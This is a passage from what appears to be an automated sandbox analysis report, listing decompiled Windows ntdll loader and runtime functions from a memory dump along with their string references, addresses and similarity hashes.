															_t95 = E011661A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1225c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01148A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1225c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1225c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0117F380(_t136, 0x1111184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01152280(_t108, 0x12286cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E011661A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01209D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0114FFB0(_t118, _t156, 0x12286cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01179A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01148799
0x0114879d
0x011487a1
0x011487a3
0x011487a8
0x011487c3
0x011487c3
0x011487c8
0x011487d1
0x011487d4
0x011487d8
0x011487e5
0x011487ec
0x01199bfe
0x01199c00
0x01199c02
0x01199c08
0x01199c0d
0x01199c0f
0x01199c14
0x01199c2d
0x01199c32
0x01199c37
0x01199c3a
0x01199c3c
0x01199c42
0x01199c42
0x01199c3c
0x01199c02
0x011487da
0x011487df
0x011487e3
0x00000000
0x00000000
0x011487e3
0x011487f2
0x00000000
0x011487fb
0x011487fd
0x011487fe
0x0114880e
0x0114880f
0x01148810
0x01148814
0x0114881a
0x0114881c
0x0114881f
0x01148821
0x01148822
0x01148824
0x01148826
0x0114882c
0x0114882e
0x01199c48
0x01199c48
0x01148834
0x01148834
0x01148837
0x00000000
0x00000000
0x01148837
0x0114882e
0x0114883d
0x01148840
0x01148843
0x01148846
0x01148849
0x0114884c
0x0114884e
0x01148850
0x01148852
0x01148854
0x01148857
0x011488b4
0x011488b6
0x011488b6
0x01148859
0x01148859
0x01148859
0x01148861
0x01148866
0x0114886a
0x0114893d
0x01148941
0x00000000
0x01148947
0x01148947
0x0114894a
0x0114894c
0x00000000
0x01148952
0x01148955
0x0114895a
0x0114895d
0x0114895d
0x0114895f
0x01148961
0x01148961
0x01148968
0x00000000
0x00000000
0x0114896a
0x0114896b
0x0114896e
0x00000000
0x01148970
0x01148970
0x01148970
0x01148970
0x01148972
0x01148972
0x01148974
0x00000000
0x0114897a
0x0114897a
0x0114897d
0x00000000
0x01148983
0x01199c65
0x01199c6d
0x01199c72
0x01199c75
0x01199c75
0x01199c82
0x01199c86
0x01199c87
0x01199c88
0x01199c89
0x01199c8c
0x01199c90
0x01199c95
0x01199c97
0x01199ca0
0x01199ca3
0x01199ca9
0x01199ca9
0x00000000
0x01199ca9
0x01199ca3
0x00000000
0x01199c97
0x0114897d
0x00000000
0x01148974
0x01148988
0x01148992
0x01148996
0x00000000
0x01148996
0x0114894c
0x00000000
0x01148870
0x0114887b
0x0114887d
0x0114887f
0x01148881
0x01148884
0x01148884
0x01148886
0x01148889
0x0114888c
0x0114888e
0x01148891
0x01148891
0x01148898
0x00000000
0x00000000
0x0114889a
0x0114889b
0x0114889e
0x00000000
0x00000000
0x011488a0
0x011488a8
0x011488b0
0x011488b2
0x011488d3
0x011488d5
0x00000000
0x011488d7
0x011488db
0x011488dc
0x011488e0
0x011488e8
0x011488ee
0x011488f0
0x011488f3
0x011488fc
0x01148901
0x01148906
0x0114890c
0x0114890c
0x0114890f
0x01148916
0x01148917
0x01148918
0x01148919
0x0114891a
0x0114891f
0x01148921
0x01199c52
0x01199c55
0x01199c5b
0x01199cac
0x01199cc0
0x01199cc0
0x01199c55
0x01148927
0x01148927
0x0114892f
0x01148933
0x00000000
0x011488f5
0x011488f5
0x00000000
0x011488f7
0x011488f7
0x011488fa
0x00000000
0x00000000
0x00000000
0x00000000
0x011488fa
0x011488f5
0x011488f3
0x00000000
0x011488d5
0x00000000
0x011488b2
0x011488c9
0x00000000
0x011488c9
0x0114887f
0x0114886a
0x01148857
0x01148852
0x011488bf
0x011488bf
0x011487aa
0x011487ad
0x011487ae
0x011487b4
0x011487b5
0x011487b6
0x011487b8
0x011487bd
0x011487c1
0x011487f4
0x011487fa
0x00000000
0x00000000
0x00000000
0x011487c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01199C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01199C18
LdrpDoPostSnapWork, xrefs: 01199C1E

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 5455f47659aef600a936c1224229b47a390d090f7778d3c377a138685bfa1a44
Instruction ID: a59b65faeb75fc6841065c8cc4b55fde7ad0a9b8aa98147eb8a544d66c3f7aab
Opcode Fuzzy Hash: 5455f47659aef600a936c1224229b47a390d090f7778d3c377a138685bfa1a44
Instruction Fuzzy Hash: 33911931A0061BDFEF2CDF99D490ABAB7B5FF84B14B054169EA05AB241E730ED01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01147E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01147E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0114CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0113C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1225780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E011B5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1225780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01157D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01157D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E011B7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01157D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01157D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E011B7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0116A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0113B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01147e4c
0x01147e50
0x01147e55
0x01147e58
0x01147e5d
0x01147e71
0x01147f33
0x01147e77
0x01147e77
0x01147e79
0x01147e79
0x01147e7e
0x01147f45
0x01199848
0x00000000
0x01199848
0x01147f4e
0x01147f53
0x01147f5a
0x00000000
0x00000000
0x0119985a
0x01199862
0x01199866
0x00000000
0x0119986c
0x00000000
0x0119986c
0x01147e84
0x01147e84
0x01147e8d
0x01199871
0x01147eb8
0x01147ec0
0x01147ec0
0x01147e9a
0x0119987e
0x00000000
0x00000000
0x01199884
0x0119988b
0x011998a7
0x011998ac
0x011998b1
0x011998b6
0x011998b8
0x011998b8
0x011998b9
0x00000000
0x011998b9
0x01147ea0
0x01147ea7
0x00000000
0x00000000
0x01147eac
0x01147eb1
0x01147ec6
0x01147ed0
0x011998cc
0x01147ed6
0x01147ed6
0x01147ed6
0x01147ede
0x01147ee3
0x011998e3
0x011998f0
0x01199902
0x011998f2
0x011998fb
0x011998fb
0x01199907
0x0119991d
0x0119991d
0x01199907
0x011998e3
0x01147ef0
0x01147f14
0x01147f14
0x01147f1e
0x01199946
0x01147f24
0x01147f24
0x01147f24
0x01147f2c
0x0119996a
0x01199975
0x01199975
0x0119997e
0x01199993
0x01199993
0x0119997e
0x00000000
0x01147ef2
0x01147efc
0x01147f0a
0x01147f0e
0x01199933
0x00000000
0x01199933
0x00000000
0x01147f0e
0x00000000
0x00000000
0x00000000
0x01147eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 01199891
minkernel\ntdll\ldrmap.c, xrefs: 011998A2
LdrpCompleteMapModule, xrefs: 01199898

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 5fb2f414d776b366aee7f129d8dad3d59e7f1563a5a1393c8ddcb9cdd0cffb85
Instruction ID: 3ea85a72069bb9ca5d140618e0248824a1b377a0e097cb03a5b9e9c9d5e4d51b
Opcode Fuzzy Hash: 5fb2f414d776b366aee7f129d8dad3d59e7f1563a5a1393c8ddcb9cdd0cffb85
Instruction Fuzzy Hash: 7C510431600749DBEB3ECB5CC944B7ABBE4AB01B18F050659E961AB7D1D734ED01C791

Uniqueness

Uniqueness Score: -1.00%

Function 0113E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0113E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0113F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E011795D0();
						}
						if(_t78 != 0) {
							L011577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0117FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0117BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01179600();
					if(_t97 < 0) {
						goto L6;
					}
					E0117BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0113F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0117BB40(_t83, _t102 + 0x24, _t78);
								if(L011443C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0117BB40(_t84, _t102 + 0x24, _t94);
									if(L011443C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0113e620
0x0113e628
0x0113e62f
0x0113e631
0x0113e635
0x0113e637
0x0113e63e
0x01195503
0x01195503
0x0113e64c
0x0113e64c
0x0113e651
0x00000000
0x00000000
0x0113e661
0x0113e665
0x0119542a
0x0113e715
0x0113e71a
0x0113e71c
0x0113e720
0x0113e720
0x0113e727
0x0113e736
0x0113e736
0x0113e743
0x0113e743
0x0113e673
0x0113e678
0x0113e67d
0x0113e682
0x0113e685
0x0113e692
0x0113e69b
0x0113e6a3
0x0113e6ad
0x0113e6b1
0x0113e6b2
0x0113e6bb
0x0113e6bf
0x0113e6c0
0x0113e6c8
0x0113e6cc
0x0113e6d5
0x0113e6d9
0x00000000
0x00000000
0x0113e6e5
0x0113e6ea
0x0113e6f9
0x0113e70b
0x0113e70f
0x01195439
0x0119545e
0x0119545e
0x00000000
0x0119545e
0x0119543b
0x0119543e
0x01195440
0x01195445
0x01195472
0x01195475
0x0119548d
0x01195493
0x011954a9
0x00000000
0x00000000
0x011954ab
0x011954b4
0x011954bc
0x011954c8
0x011954de
0x011954fb
0x011954e0
0x011954e6
0x011954eb
0x011954eb
0x011954de
0x00000000
0x011954bc
0x01195477
0x0119547a
0x01195480
0x01195483
0x01195486
0x0119548b
0x00000000
0x00000000
0x00000000
0x0119548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01195447
0x01195447
0x01195447
0x01195447
0x0119544e
0x00000000
0x00000000
0x01195450
0x01195452
0x01195455
0x0119545a
0x00000000
0x00000000
0x00000000
0x0119545c
0x0119546a
0x0119546d
0x0119546f
0x00000000
0x0119546f
0x0113e70f

Strings

@, xrefs: 0113E6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0113E68C
InstallLanguageFallback, xrefs: 0113E6DB

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 219ab9dd20a0820a705e1589b5e6f95769a0f149572885237df4699bf9b378ee
Instruction ID: d7b7a62e465eb5dbc081358b0c0bf3f1150e82761c9f405bc000558dacc112e6
Opcode Fuzzy Hash: 219ab9dd20a0820a705e1589b5e6f95769a0f149572885237df4699bf9b378ee
Instruction Fuzzy Hash: 2951D2726093069BDB5ADF28C440A6BB7E9BF88758F05092EF995E7340F734D904C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 011FE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON

Download Yara Rule

Strings

`, xrefs: 011FE670
`, xrefs: 011FE5D7

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 754e70e1bbebda89008c13e91011958a5f7d768b67769c64b147a9e3129cca14
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: F19193312057429FE728CE29C845B1BBBE5AFC4724F15892DF799C72A0E774E804CB92

Uniqueness

Uniqueness Score: -1.00%

Function 011B51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON

Download Yara Rule

Strings

Legacy, xrefs: 011B5226
UEFI, xrefs: 011B521D

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 7d4c7f810788823d4dbca7ebcdeac012fd3c8828da0099cbea58691e46395dbe
Instruction ID: dbd4786203e3e9cfc2b4718cd30e86a35446045c0355c323d915066887e17bbb
Opcode Fuzzy Hash: 7d4c7f810788823d4dbca7ebcdeac012fd3c8828da0099cbea58691e46395dbe
Instruction Fuzzy Hash: 9F5189B1E05609DFDB68DFA88880BAEBBBABF48704F14402DE609EB351D7719900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0115B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0115B9A5

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 25b7f7f53a6e2ab21deb54035b6080384454444122ae76dfa428f5b9b0546c66
Instruction ID: 35ba23a85cbef8a1b8f738480f1cc89eb3a2acaab4832840f14698b9f99f5cc7
Opcode Fuzzy Hash: 25b7f7f53a6e2ab21deb54035b6080384454444122ae76dfa428f5b9b0546c66
Instruction Fuzzy Hash: C0517A71A08341CFC769CF28C08092BBBF6FB88604F55896EF9A587345E770E844CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0113B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON

Download Yara Rule

APIs

_vswprintf_s.LIBCMT ref: 011948AD

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 77fe84361466f1186ad7860b5466d78ec9625c86fd84c88037b5c39b32b7c0f5
Instruction ID: 2c9377880bf77a93c0c4f602965f94324bd752c7517c3a5aec789c617d91a8fb
Opcode Fuzzy Hash: 77fe84361466f1186ad7860b5466d78ec9625c86fd84c88037b5c39b32b7c0f5
Instruction Fuzzy Hash: AA51D371D042598EEF39DFA8CA44BBEBBB0BF04714F1141ADD869AB682D7704942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01162581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

PATH, xrefs: 01162642, 01162691

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: b2d8ad2ba8d0227d37d33f9339a30cf36a519630822b02fe159e23999a5565d5
Instruction ID: 07701ee3a5e3efa06df1175a033a72f4d94b9f99e391779fc1408005f80f9835
Opcode Fuzzy Hash: b2d8ad2ba8d0227d37d33f9339a30cf36a519630822b02fe159e23999a5565d5
Instruction Fuzzy Hash: 4BC1C375E00619EFCB2CDF98D880BBDBBB5FF58704F454029E901AB250D739A951CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0116FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON

Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 011ABE0F

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 2605ee3c07ace40782f16dccb409d9c623ee716a869eb868fdc5df497bfa584b
Instruction ID: 1bfb4c1e6779c5b57b3c050294646fd3da16bba7d3e65329ebc98e4050177ff0
Opcode Fuzzy Hash: 2605ee3c07ace40782f16dccb409d9c623ee716a869eb868fdc5df497bfa584b
Instruction Fuzzy Hash: 63A14635B046478BEB2DCF6CD460B7EBBA9BF44724F054569DA16CB684EB31D802CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01132D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0118FA4A

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: c9a0181ac69552a09eed8177b883a23213a9439c43f0eff07df26fa3d2ef1d39
Instruction ID: ff91833bcf36b186ef2a09db83d15a1f19fdc305fc5130dbfd51c4a308ea6f2f
Opcode Fuzzy Hash: c9a0181ac69552a09eed8177b883a23213a9439c43f0eff07df26fa3d2ef1d39
Instruction Fuzzy Hash: 27615A31A00616EFDB3EFF6CC885B7EB7A5EB84724F154269E911972C1C7349902CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01200EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

`, xrefs: 01200F16

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: f5fe110007b5cedbbba18a8243aefff16df1f45ba496632ac4fce91e67b16013
Instruction ID: 4583f1f8cb881be20ef9f317ddc39069fe385bbfbc6694a9ff7ee3e08ccaf169
Opcode Fuzzy Hash: f5fe110007b5cedbbba18a8243aefff16df1f45ba496632ac4fce91e67b16013
Instruction Fuzzy Hash: B951A1713143429FE326DF18D884B1BBBE6EBC4754F040A2CFA9687291DB74E805C762

Uniqueness

Uniqueness Score: -1.00%

Function 0116F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 0116F124

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 5cb21c6eeb09c026f4b153afed65e2d77f65e6cfdadfe9f0784e802d97af44a3
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: EC51AC71204715AFC324DF29C840A6BBBF8FF58714F00892EFAA587690E7B4E955CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011B3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 011B358F

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: c3aa95fa3c5bad7f7af7e6b7238d870a4dcd8dae826510295e721925073064ff
Instruction ID: e8d546ed9b0df4eb0644fdc40592c50d9e91ec19fd44a04a15801e55a1805416
Opcode Fuzzy Hash: c3aa95fa3c5bad7f7af7e6b7238d870a4dcd8dae826510295e721925073064ff
Instruction Fuzzy Hash: C34164B1D1052DABDB25DA50CC80FEEB77CAB44718F0045A5EA18AB240DB309F98CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 012005AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`, xrefs: 01200633

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 50efd61ceb2997887220abe60e960856f28317efa69898118305e7bd71ea4100
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 8F312232600306AFF711DE29CC45F9B7BAAAB84794F144229FB489B2C1D770E904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 011B3884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 011B38B4

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 18a84838a6cf1ab4502f0d9217ae41872ca4e5dc492b7208f7dccd2be369a797
Instruction ID: 2cc7d2da7018eb6467a85e5344ab027bce07a81db3c9f74091760921163590e0
Opcode Fuzzy Hash: 18a84838a6cf1ab4502f0d9217ae41872ca4e5dc492b7208f7dccd2be369a797
